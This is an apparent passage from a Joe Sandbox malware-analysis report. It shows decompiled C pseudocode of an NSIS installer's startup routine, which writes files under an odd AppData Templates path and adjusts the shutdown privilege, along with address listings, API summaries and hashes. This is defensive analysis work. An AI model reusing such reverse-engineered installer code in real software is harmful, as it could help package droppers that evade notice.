				signed int _v42;
				long _v44;
				signed int _v48;
				char _v163;
				char _v175;
				signed short _v182;
				struct _OSVERSIONINFOA _v196;
				struct _SHFILEINFOA _v548;
				intOrPtr* _t87;
				char* _t93;
				void* _t95;
				void* _t99;
				CHAR* _t101;
				signed int _t103;
				int _t106;
				void* _t107;
				int _t108;
				void* _t110;
				void* _t134;
				signed int _t150;
				void* _t153;
				void* _t158;
				intOrPtr* _t159;
				void* _t170;
				CHAR* _t173;
				void _t179;
				void* _t198;
				void* _t199;
				signed char* _t213;
				CHAR* _t217;
				void* _t223;

				_v20 = 0;
				_v8 = "Error writing temporary file. Make sure your temp folder is valid.";
				_v12 = 0;
				_v16 = 0x20;
				SetErrorMode(0x8001); // executed
				_v196.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v196.dwOSVersionInfoSize = 0x9c;
				if(GetVersionExA( &_v196) != 0) {
					L3:
					_t223 = _v196.dwPlatformId - 2;
					L4:
					if(_t223 < 0) {
						_v42 = _v42 & 0x00000000;
						if(_v175 < 0x41) {
							_v48 = 0;
						} else {
							_v48 = _v175 - 0x40;
						}
					}
					if(_v196.dwMajorVersion < 0xa) {
						_v182 = _v182 & 0x00000000;
					}
					 *0x4524d8 = _v196.dwBuildNumber;
					 *0x4524dc = (_v196.dwMajorVersion & 0x0000ffff | _v196.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
					if( *0x4524de != 0x600) {
						_t159 = E00406663(0);
						if(_t159 != 0) {
							 *_t159(0xc00);
						}
					}
					_t217 = "UXTHEME";
					goto L14;
					while(1) {
						L37:
						_t179 =  *_t95;
						_t234 = _t179;
						if(_t179 == 0) {
							break;
						}
						__eflags = _t179 - 0x20;
						if(_t179 != 0x20) {
							L23:
							__eflags =  *_t95 - 0x22;
							_v16 = 0x20;
							if( *_t95 == 0x22) {
								_t95 = _t95 + 1;
								__eflags = _t95;
								_v16 = 0x22;
							}
							__eflags =  *_t95 - 0x2f;
							if( *_t95 != 0x2f) {
								L35:
								_t95 = E00405C14(_t95, _v16);
								__eflags =  *_t95 - 0x22;
								if(__eflags == 0) {
									_t95 = _t95 + 1;
									__eflags = _t95;
								}
								continue;
							} else {
								_t95 = _t95 + 1;
								__eflags =  *_t95 - 0x53;
								if( *_t95 != 0x53) {
									L30:
									__eflags =  *_t95 - ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC");
									if( *_t95 != ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC")) {
										L34:
										__eflags =  *(_t95 - 2) - ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=");
										if( *(_t95 - 2) == ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=")) {
											 *(_t95 - 2) =  *(_t95 - 2) & 0x00000000;
											__eflags = _t95 + 2;
											E00406257("C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes", _t95 + 2);
											L40:
											GetTempPathA(0x2000, 0x485000); // executed
											_t99 = E00403382(_t234);
											_t235 = _t99;
											if(_t99 != 0) {
												L43:
												DeleteFileA(0x483000); // executed
												_t101 = E00402F0C(_t237, _v12); // executed
												_v8 = _t101;
												if(_t101 != 0) {
													L53:
													E00403963();
													__imp__OleUninitialize();
													_t248 = _v8;
													if(_v8 == 0) {
														__eflags =  *0x4524b4;
														if( *0x4524b4 == 0) {
															L77:
															_t103 =  *0x4524cc;
															__eflags = _t103 - 0xffffffff;
															if(_t103 != 0xffffffff) {
																_v20 = _t103;
															}
															ExitProcess(_v20);
														}
														_t106 = OpenProcessToken(GetCurrentProcess(), 0x28,  &_v24);
														__eflags = _t106;
														if(_t106 != 0) {
															LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v40.Privileges));
															_v40.PrivilegeCount = 1;
															_v28 = 2;
															AdjustTokenPrivileges(_v24, 0,  &_v40, 0, 0, 0);
														}
														_t107 = E00406663(4);
														__eflags = _t107;
														if(_t107 == 0) {
															L75:
															_t108 = ExitWindowsEx(2, 0x80040002);
															__eflags = _t108;
															if(_t108 != 0) {
																goto L77;
															}
															goto L76;
														} else {
															_t110 =  *_t107(0, 0, 0, 0x25, 0x80040002);
															__eflags = _t110;
															if(_t110 == 0) {
																L76:
																E0040140B(9);
																goto L77;
															}
															goto L75;
														}
													}
													E0040596D(_v8, 0x200010);
													ExitProcess(2);
												}
												if( *0x45243c == _t101) {
													L52:
													 *0x4524cc =  *0x4524cc | 0xffffffff;
													_v20 = E00403A3D( *0x4524cc);
													goto L53;
												}
												_t213 = E00405C14(0x47b000, _t101);
												if(_t213 < 0x47b000) {
													L49:
													_t244 = _t213 - 0x47b000;
													_v8 = "Error launching installer";
													if(_t213 < 0x47b000) {
														_t173 = E004058D8(_t248);
														lstrcatA(0x485000, "~nsu");
														if(_t173 != 0) {
															lstrcatA(0x485000, "A");
														}
														lstrcatA(0x485000, ".tmp");
														if(lstrcmpiA(0x485000, 0x481000) != 0) {
															_push(0x485000);
															if(_t173 == 0) {
																E004058BB();
															} else {
																E0040583E();
															}
															SetCurrentDirectoryA(0x485000);
															if("C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes" == 0) {
																E00406257("C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes", 0x481000);
															}
															E00406257(0x453000, _v24);
															_t194 = "A";
															_v12 = 0x1a;
															 *0x455000 = "A";
															do {
																E004062EA(_t173, 0x432050, 0x485000, 0x432050,  *((intOrPtr*)( *0x452430 + 0x120)));
																DeleteFileA(0x432050);
																_t173 = 0;
																if(_v8 != 0 && CopyFileA(0x489000, 0x432050, 1) != 0) {
																	E00406030(_t194, 0x432050, 0);
																	E004062EA(0, 0x432050, 0x485000, 0x432050,  *((intOrPtr*)( *0x452430 + 0x124)));
																	_t134 = E004058F0(0x432050);
																	if(_t134 != 0) {
																		CloseHandle(_t134);
																		_v8 = 0;
																	}
																}
																 *0x455000 =  *0x455000 + 1;
																_t62 =  &_v12;
																 *_t62 = _v12 - 1;
															} while ( *_t62 != 0);
															E00406030(_t194, 0x485000, _t173);
														}
														goto L53;
													}
													 *_t213 =  *_t213 & 0x00000000;
													_t214 =  &(_t213[4]);
													if(E00405CD7(_t244,  &(_t213[4])) == 0) {
														goto L53;
													}
													E00406257("C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes", _t214);
													E00406257("C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes", _t214);
													_v8 = _v8 & 0x00000000;
													goto L52;
												}
												_t150 = (( *0x40a15b << 0x00000008 |  *0x40a15a) << 0x00000008 |  *0x40a159) << 0x00000008 | " _?=";
												while( *_t213 != _t150) {
													_t213 = _t213 - 1;
													if(_t213 >= 0x47b000) {
														continue;
													}
													goto L49;
												}
												goto L49;
											}
											GetWindowsDirectoryA(0x485000, 0x1ffb);
											lstrcatA(0x485000, "\\Temp");
											_t153 = E00403382(_t235);
											_t236 = _t153;
											if(_t153 != 0) {
												goto L43;
											}
											GetTempPathA(0x1ffc, 0x485000);
											lstrcatA(0x485000, "Low");
											SetEnvironmentVariableA("TEMP", 0x485000);
											SetEnvironmentVariableA("TMP", 0x485000);
											_t158 = E00403382(_t236);
											_t237 = _t158;
											if(_t158 == 0) {
												goto L53;
											}
											goto L43;
										}
										goto L35;
									}
									_t198 =  *((intOrPtr*)(_t95 + 4));
									__eflags = _t198 - 0x20;
									if(_t198 == 0x20) {
										L33:
										_t42 =  &_v12;
										 *_t42 = _v12 | 0x00000004;
										__eflags =  *_t42;
										goto L34;
									}
									__eflags = _t198;
									if(_t198 != 0) {
										goto L34;
									}
									goto L33;
								}
								_t199 =  *(_t95 + 1);
								__eflags = _t199 - 0x20;
								if(_t199 == 0x20) {
									L29:
									 *0x4524c0 = 1;
									goto L30;
								}
								__eflags = _t199;
								if(_t199 != 0) {
									goto L30;
								}
								goto L29;
							}
						} else {
							goto L22;
						}
						do {
							L22:
							_t95 = _t95 + 1;
							__eflags =  *_t95 - 0x20;
						} while ( *_t95 == 0x20);
						goto L23;
					}
					goto L40;
					L14:
					E004065F5(_t217); // executed
					_t217 =  &(_t217[lstrlenA(_t217) + 1]);
					if( *_t217 != 0) {
						goto L14;
					} else {
						E00406663(0xb);
						 *0x452424 = E00406663(9);
						_t87 = E00406663(7);
						if(_t87 != 0) {
							_t87 =  *_t87(0x1e);
							if(_t87 != 0) {
								 *0x4524dc =  *0x4524dc | 0x00000080;
							}
						}
						__imp__#17(_t170);
						__imp__OleInitialize(0); // executed
						 *0x4524e0 = _t87;
						SHGetFileInfoA(0x434050, 0,  &_v548, 0x160, 0); // executed
						E00406257(0x44e420, "NSIS Error");
						E00406257(0x47b000, GetCommandLineA());
						 *0x452420 = 0x400000;
						_t93 = 0x47b000;
						if( *0x47b000 == 0x22) {
							_v16 = 0x22;
							_t93 = 0x47b001;
						}
						_t95 = CharNextA(E00405C14(_t93, _v16));
						_v24 = _t95;
						goto L37;
					}
				}
				_v196.dwOSVersionInfoSize = 0x94;
				GetVersionExA( &_v196);
				if(_v196.dwPlatformId != 2) {
					goto L4;
				} else {
					_v42 = 4;
					asm("sbb eax, eax");
					_v48 =  !( ~(_v196.szCSDVersion - 0x53)) & _v163 - 0x00000030;
					goto L3;
				}
			}









































                                                            0x004033c5
                                                            0x004033c8
                                                            0x004033cf
                                                            0x004033d2
                                                            0x004033d6
                                                            0x004033e9
                                                            0x004033ef
                                                            0x004033f2
                                                            0x004033f5
                                                            0x00403403
                                                            0x00403444
                                                            0x00403444
                                                            0x0040344b
                                                            0x0040344b
                                                            0x0040344d
                                                            0x00403458
                                                            0x0040346b
                                                            0x0040345a
                                                            0x00403465
                                                            0x00403465
                                                            0x00403458
                                                            0x00403476
                                                            0x00403478
                                                            0x00403478
                                                            0x0040348d
                                                            0x004034b2
                                                            0x004034c0
                                                            0x004034c3
                                                            0x004034ca
                                                            0x004034d1
                                                            0x004034d1
                                                            0x004034ca
                                                            0x004034d3
                                                            0x004034d3
                                                            0x0040365a
                                                            0x0040365a
                                                            0x0040365a
                                                            0x0040365c
                                                            0x0040365e
                                                            0x00000000
                                                            0x00000000
                                                            0x0040359e
                                                            0x004035a1
                                                            0x004035a9
                                                            0x004035a9
                                                            0x004035ac
                                                            0x004035b0
                                                            0x004035b2
                                                            0x004035b2
                                                            0x004035b3
                                                            0x004035b3
                                                            0x004035b7
                                                            0x004035ba
                                                            0x0040364b
                                                            0x0040364f
                                                            0x00403654
                                                            0x00403657
                                                            0x00403659
                                                            0x00403659
                                                            0x00403659
                                                            0x00000000
                                                            0x004035c0
                                                            0x004035c0
                                                            0x004035c1
                                                            0x004035c4
                                                            0x004035dc
                                                            0x00403607
                                                            0x00403609
                                                            0x0040361b
                                                            0x00403646
                                                            0x00403649
                                                            0x00403666
                                                            0x0040366a
                                                            0x00403673
                                                            0x00403678
                                                            0x00403689
                                                            0x0040368b
                                                            0x00403690
                                                            0x00403692
                                                            0x004036ea
                                                            0x004036ef
                                                            0x004036f8
                                                            0x004036ff
                                                            0x00403702
                                                            0x00403795
                                                            0x00403795
                                                            0x0040379a
                                                            0x004037a3
                                                            0x004037a6
                                                            0x004038cf
                                                            0x004038d5
                                                            0x0040394d
                                                            0x0040394d
                                                            0x00403952
                                                            0x00403955
                                                            0x00403957
                                                            0x00403957
                                                            0x0040395d
                                                            0x0040395d
                                                            0x004038e4
                                                            0x004038ea
                                                            0x004038ec
                                                            0x004038f8
                                                            0x00403909
                                                            0x00403910
                                                            0x00403917
                                                            0x00403917
                                                            0x0040391f
                                                            0x00403924
                                                            0x0040392b
                                                            0x00403939
                                                            0x0040393c
                                                            0x00403942
                                                            0x00403944
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040392d
                                                            0x00403933
                                                            0x00403935
                                                            0x00403937
                                                            0x00403946
                                                            0x00403948
                                                            0x00000000
                                                            0x00403948
                                                            0x00000000
                                                            0x00403937
                                                            0x0040392b
                                                            0x004037b4
                                                            0x004037bb
                                                            0x004037bb
                                                            0x0040370e
                                                            0x00403786
                                                            0x00403786
                                                            0x00403792
                                                            0x00000000
                                                            0x00403792
                                                            0x00403717
                                                            0x0040371b
                                                            0x00403751
                                                            0x00403751
                                                            0x00403753
                                                            0x0040375a
                                                            0x004037cc
                                                            0x004037ce
                                                            0x004037d5
                                                            0x004037dd
                                                            0x004037dd
                                                            0x004037e8
                                                            0x004037fc
                                                            0x00403800
                                                            0x00403801
                                                            0x0040380a
                                                            0x00403803
                                                            0x00403803
                                                            0x00403803
                                                            0x00403810
                                                            0x0040381d
                                                            0x00403825
                                                            0x00403825
                                                            0x00403832
                                                            0x00403837
                                                            0x00403841
                                                            0x00403855
                                                            0x0040385b
                                                            0x00403867
                                                            0x0040386d
                                                            0x00403873
                                                            0x00403878
                                                            0x0040388e
                                                            0x0040389f
                                                            0x004038a5
                                                            0x004038ac
                                                            0x004038af
                                                            0x004038b5
                                                            0x004038b5
                                                            0x004038ac
                                                            0x004038b8
                                                            0x004038be
                                                            0x004038be
                                                            0x004038be
                                                            0x004038c5
                                                            0x004038c5
                                                            0x00000000
                                                            0x004037fc
                                                            0x0040375c
                                                            0x0040375f
                                                            0x0040376a
                                                            0x00000000
                                                            0x00000000
                                                            0x00403772
                                                            0x0040377d
                                                            0x00403782
                                                            0x00000000
                                                            0x00403782
                                                            0x00403746
                                                            0x00403748
                                                            0x0040374c
                                                            0x0040374f
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040374f
                                                            0x00000000
                                                            0x00403748
                                                            0x0040369a
                                                            0x004036a6
                                                            0x004036ab
                                                            0x004036b0
                                                            0x004036b2
                                                            0x00000000
                                                            0x00000000
                                                            0x004036ba
                                                            0x004036c2
                                                            0x004036d3
                                                            0x004036db
                                                            0x004036dd
                                                            0x004036e2
                                                            0x004036e4
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004036e4
                                                            0x00000000
                                                            0x00403649
                                                            0x0040360b
                                                            0x0040360e
                                                            0x00403611
                                                            0x00403617
                                                            0x00403617
                                                            0x00403617
                                                            0x00403617
                                                            0x00000000
                                                            0x00403617
                                                            0x00403613
                                                            0x00403615
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00403615
                                                            0x004035c6
                                                            0x004035c9
                                                            0x004035cc
                                                            0x004035d2
                                                            0x004035d2
                                                            0x00000000
                                                            0x004035d2
                                                            0x004035ce
                                                            0x004035d0
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004035d0
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004035a3
                                                            0x004035a3
                                                            0x004035a3
                                                            0x004035a4
                                                            0x004035a4
                                                            0x00000000
                                                            0x004035a3
                                                            0x00000000
                                                            0x004034d8
                                                            0x004034d9
                                                            0x004034e5
                                                            0x004034ec
                                                            0x00000000
                                                            0x004034ee
                                                            0x004034f0
                                                            0x004034fe
                                                            0x00403503
                                                            0x0040350a
                                                            0x0040350e
                                                            0x00403512
                                                            0x00403514
                                                            0x00403514
                                                            0x00403512
                                                            0x0040351c
                                                            0x00403523
                                                            0x00403529
                                                            0x00403541
                                                            0x00403551
                                                            0x00403563
                                                            0x0040356f
                                                            0x00403579
                                                            0x0040357b
                                                            0x0040357d
                                                            0x00403581
                                                            0x00403581
                                                            0x00403590
                                                            0x00403596
                                                            0x00000000
                                                            0x00403596
                                                            0x004034ec
                                                            0x0040340b
                                                            0x00403416
                                                            0x0040341f
                                                            0x00000000
                                                            0x00403421
                                                            0x00403434
                                                            0x0040343a
                                                            0x00403440
                                                            0x00000000
                                                            0x00403440

                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00008001), ref: 004033D6
                                                            • GetVersionExA.KERNEL32(?), ref: 004033FF
                                                            • GetVersionExA.KERNEL32(0000009C), ref: 00403416
                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034DF
                                                            • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 0040351C
                                                            • OleInitialize.OLE32(00000000), ref: 00403523
                                                            • SHGetFileInfoA.SHELL32(00434050,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403541
                                                            • GetCommandLineA.KERNEL32(0044E420,NSIS Error,?,00000007,00000009,0000000B), ref: 00403556
                                                            • CharNextA.USER32(00000000), ref: 00403590
                                                            • GetTempPathA.KERNEL32(00002000,00485000), ref: 00403689
                                                            • GetWindowsDirectoryA.KERNEL32(00485000,00001FFB,?,00000007,00000009,0000000B), ref: 0040369A
                                                            • lstrcatA.KERNEL32(00485000,\Temp,?,00000007,00000009,0000000B), ref: 004036A6
                                                            • GetTempPathA.KERNEL32(00001FFC,00485000), ref: 004036BA
                                                            • lstrcatA.KERNEL32(00485000,Low,?,00000007,00000009,0000000B), ref: 004036C2
                                                            • SetEnvironmentVariableA.KERNEL32(TEMP,00485000,00485000,Low,?,00000007,00000009,0000000B), ref: 004036D3
                                                            • SetEnvironmentVariableA.KERNEL32(TMP,00485000,?,00000007,00000009,0000000B), ref: 004036DB
                                                            • DeleteFileA.KERNELBASE(00483000,?,00000007,00000009,0000000B), ref: 004036EF
                                                            • OleUninitialize.OLE32 ref: 0040379A
                                                            • ExitProcess.KERNEL32 ref: 004037BB
                                                            • lstrcatA.KERNEL32(00485000,~nsu,0047B000,00000000,?,?,00000007,00000009,0000000B), ref: 004037CE
                                                            • lstrcatA.KERNEL32(00485000,0040A14C,00485000,~nsu,0047B000,00000000,?,?,00000007,00000009,0000000B), ref: 004037DD
                                                            • lstrcatA.KERNEL32(00485000,.tmp,00485000,~nsu,0047B000,00000000,?,?,00000007,00000009,0000000B), ref: 004037E8
                                                            • lstrcmpiA.KERNEL32(00485000,00481000,00485000,.tmp,00485000,~nsu,0047B000,00000000,?,?,00000007,00000009,0000000B), ref: 004037F4
                                                            • SetCurrentDirectoryA.KERNEL32(00485000,00485000,?,00000007,00000009,0000000B), ref: 00403810
                                                            • DeleteFileA.KERNEL32(00432050,00432050,?,00453000,?,?,00000007,00000009,0000000B), ref: 0040386D
                                                            • CopyFileA.KERNEL32 ref: 00403882
                                                            • CloseHandle.KERNEL32(00000000), ref: 004038AF
                                                            • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004038DD
                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004038E4
                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004038F8
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403917
                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 0040393C
                                                            • ExitProcess.KERNEL32 ref: 0040395D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                            • String ID: "$.tmp$A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes$Error launching installer$Low$NSIS Error$P C$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                            • API String ID: 1000954069-3321099877
                                                            • Opcode ID: 5b4a1273ff86c7f48266d57c72b3d881aaa6ca9625edc3239ebafd6de991659e
                                                            • Instruction ID: 35a904cfeb39216351fef3eee688bc31b7ac6ceac067f98900564130ed648918
                                                            • Opcode Fuzzy Hash: 5b4a1273ff86c7f48266d57c72b3d881aaa6ca9625edc3239ebafd6de991659e
                                                            • Instruction Fuzzy Hash: DBE10470904354AADB216F758D49BAF7EB8AF4630AF0440BFE445B62D2C77C4A44CB2E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 73C32288 Relevance: 25.2, APIs: 13, Strings: 1, Instructions: 667stringlibrarymemoryCOMMONCrypto
                                                            Download Yara Rule
                                                            C-Code - Quality: 93%
                                                            			E73C32288() {
				CHAR* _t236;
				void* _t238;
				signed int _t239;
				char _t240;
				char _t241;
				void _t242;
				CHAR* _t243;
				void* _t249;
				struct HINSTANCE__* _t250;
				CHAR* _t251;
				int _t252;
				CHAR* _t253;
				signed short _t255;
				CHAR* _t259;
				void* _t260;
				CHAR** _t261;
				intOrPtr _t264;
				void* _t272;
				signed int _t273;
				CHAR* _t274;
				CHAR* _t276;
				CHAR* _t279;
				void* _t281;
				CHAR* _t282;
				void _t283;
				signed int _t287;
				void* _t288;
				void* _t291;
				CHAR* _t298;
				signed int _t299;
				CHAR* _t303;
				CHAR* _t305;
				CHAR* _t306;
				CHAR* _t307;
				CHAR* _t312;
				CHAR* _t313;
				char _t319;
				CHAR* _t320;
				char _t323;
				signed int _t333;
				void* _t335;
				CHAR* _t336;
				CHAR* _t337;
				void _t338;
				CHAR* _t341;
				CHAR* _t343;
				signed int _t345;
				signed int _t346;
				void* _t347;
				void* _t348;
				void* _t349;
				signed int _t355;
				CHAR* _t360;
				void* _t361;
				signed int _t368;
				signed int _t369;
				CHAR* _t370;
				void* _t371;
				CHAR* _t377;
				signed int _t379;
				CHAR* _t380;
				void* _t382;
				void* _t383;
				CHAR* _t384;
				CHAR* _t385;
				CHAR* _t386;
				CHAR* _t387;
				struct HINSTANCE__* _t388;
				CHAR* _t390;
				void* _t391;
				void* _t392;

				 *(_t392 + 0x1c) = 0;
				_t382 = 0;
				 *(_t392 + 0x34) = 0;
				 *(_t392 + 0x30) = 0;
				 *(_t392 + 0x18) = 0;
				 *(_t392 + 0x2c) = 0;
				 *(_t392 + 0x3c) = 0;
				 *(_t392 + 0x28) = 0;
				_t236 = E73C312C6();
				 *(_t392 + 0x14) = _t236;
				_t312 = _t236;
				 *(_t392 + 0x38) = E73C312C6();
				_t238 = E73C3152B();
				_t391 = _t238;
				 *(_t392 + 0x44) = _t238;
				_t383 = _t238;
				 *(_t392 + 0x24) = _t391;
				 *((intOrPtr*)(_t392 + 0x48)) = 2;
				_t239 = 0;
				while(1) {
					_t368 = _t239;
					 *(_t392 + 0x40) = _t368;
					if(_t239 != 0 && _t382 == 0) {
						break;
					}
					_t240 =  *_t391;
					 *((char*)(_t392 + 0x13)) = _t240;
					_t241 = _t240;
					_t319 = _t241;
					if(_t319 == 0) {
						_t169 = _t392 + 0x1c;
						 *_t169 =  *(_t392 + 0x1c) | 0xffffffff;
						__eflags =  *_t169;
						L132:
						_t369 = _t368;
						if(_t369 == 0) {
							_t370 = 0;
							 *_t312 = 0;
							__eflags = _t382;
							if(_t382 == 0) {
								_t281 = GlobalAlloc(0x40, 0x14a4); // executed
								_t382 = _t281;
								_t370 = 0;
								__eflags = 0;
								 *(_t382 + 0x810) = 0;
								 *(_t382 + 0x814) = 0;
							}
							_t242 =  *(_t392 + 0x34);
							_t177 = _t382 + 8; // 0x8
							_t320 = _t177;
							_t178 = _t382 + 0x408; // 0x408
							_t384 = _t178;
							 *_t382 = _t242;
							 *_t320 = _t370;
							 *_t384 = _t370;
							 *(_t382 + 0x808) = _t370;
							 *(_t382 + 0x80c) = _t370;
							 *(_t382 + 4) = _t370;
							_t243 = _t242 - _t370;
							__eflags = _t243;
							if(_t243 == 0) {
								__eflags = _t312 -  *(_t392 + 0x14);
								if(_t312 ==  *(_t392 + 0x14)) {
									goto L154;
								}
								_t390 = _t370;
								GlobalFree(_t382);
								_push( *(_t392 + 0x14));
								_t382 = E73C31326();
								__eflags = _t382;
								if(_t382 == 0) {
									goto L154;
								} else {
									goto L147;
								}
								while(1) {
									L147:
									_t272 =  *(_t382 + 0x14a0);
									__eflags = _t272;
									if(_t272 == 0) {
										break;
									}
									_t390 = _t382;
									_t382 = _t272;
								}
								__eflags = _t390;
								if(_t390 != 0) {
									_t187 =  &(_t390[0x14a0]);
									 *_t187 = _t390[0x14a0] & 0x00000000;
									__eflags =  *_t187;
								}
								_t273 =  *(_t382 + 0x810);
								__eflags = _t273 & 0x00000008;
								if((_t273 & 0x00000008) == 0) {
									_t333 = 2;
									_t274 = _t273 | _t333;
									__eflags = _t274;
									 *(_t382 + 0x810) = _t274;
								} else {
									_t382 = E73C312D5(_t382);
									 *(_t382 + 0x810) =  *(_t382 + 0x810) & 0xfffffff5;
								}
								goto L154;
							} else {
								_t276 = _t243 - 1;
								__eflags = _t276;
								if(_t276 == 0) {
									L143:
									lstrcpyA(_t320,  *(_t392 + 0x38));
									L144:
									lstrcpyA(_t384,  *(_t392 + 0x14));
									L154:
									_t312 =  *(_t392 + 0x14);
									L155:
									_t239 =  *(_t392 + 0x1c);
									_t391 = _t391 + 1;
									 *(_t392 + 0x24) = _t391;
									_t383 = _t391;
									if(_t239 != 0xffffffff) {
										continue;
									}
									break;
								}
								_t279 = _t276 - 1;
								__eflags = _t279;
								if(_t279 == 0) {
									goto L144;
								}
								__eflags = _t279 != 1;
								if(_t279 != 1) {
									goto L154;
								}
								goto L143;
							}
						}
						_t371 = _t369 - 1;
						if(_t371 == 0) {
							_t282 =  *(_t392 + 0x30);
							if( *(_t392 + 0x2c) == _t371) {
								_t282 = _t282 - 1;
							}
							 *(_t382 + 0x814) = _t282;
						}
						goto L154;
					}
					_t335 = _t319 - 0x23;
					if(_t335 == 0) {
						_t336 =  *(_t392 + 0x1c);
						__eflags = _t383 -  *(_t392 + 0x44);
						if(_t383 <=  *(_t392 + 0x44)) {
							L29:
							__eflags =  *(_t392 + 0x28);
							if( *(_t392 + 0x28) != 0) {
								L15:
								_t337 = _t336;
								__eflags = _t337;
								if(_t337 == 0) {
									_t283 =  *((intOrPtr*)(_t392 + 0x13));
									while(1) {
										__eflags = _t283 - 0x22;
										if(_t283 != 0x22) {
											break;
										}
										_t391 = _t391 + 1;
										__eflags =  *(_t392 + 0x28);
										_t383 = _t391;
										if( *(_t392 + 0x28) == 0) {
											__eflags = 1;
											 *(_t392 + 0x28) = 1;
											L121:
											 *_t312 =  *_t391;
											_t312 =  &(_t312[1]);
											goto L155;
										}
										_t157 = _t392 + 0x28;
										 *_t157 =  *(_t392 + 0x28) & 0x00000000;
										__eflags =  *_t157;
										_t283 =  *_t391;
									}
									__eflags = _t283 - 0x2a;
									if(_t283 == 0x2a) {
										_t287 = 2;
										 *(_t392 + 0x34) = _t287;
										L129:
										_t385 =  *(_t392 + 0x14);
										L130:
										_t312 = _t385;
										goto L155;
									}
									__eflags = _t283 - 0x2d;
									if(_t283 == 0x2d) {
										L117:
										_t338 =  *_t391;
										__eflags = _t338 - 0x2d;
										if(_t338 != 0x2d) {
											L122:
											_t162 = _t391 + 1; // 0x1
											_t288 = _t162;
											__eflags =  *_t288 - 0x3a;
											if( *_t288 != 0x3a) {
												goto L121;
											}
											__eflags = _t338 - 0x2d;
											if(_t338 == 0x2d) {
												goto L121;
											}
											__eflags = 1;
											 *(_t392 + 0x34) = 1;
											L125:
											_t385 =  *(_t392 + 0x14);
											_t391 = _t288;
											__eflags = _t312 - _t385;
											if(_t312 <= _t385) {
												 *( *(_t392 + 0x38)) = 0;
											} else {
												 *_t312 = 0;
												lstrcpyA( *(_t392 + 0x3c), _t385);
											}
											goto L130;
										}
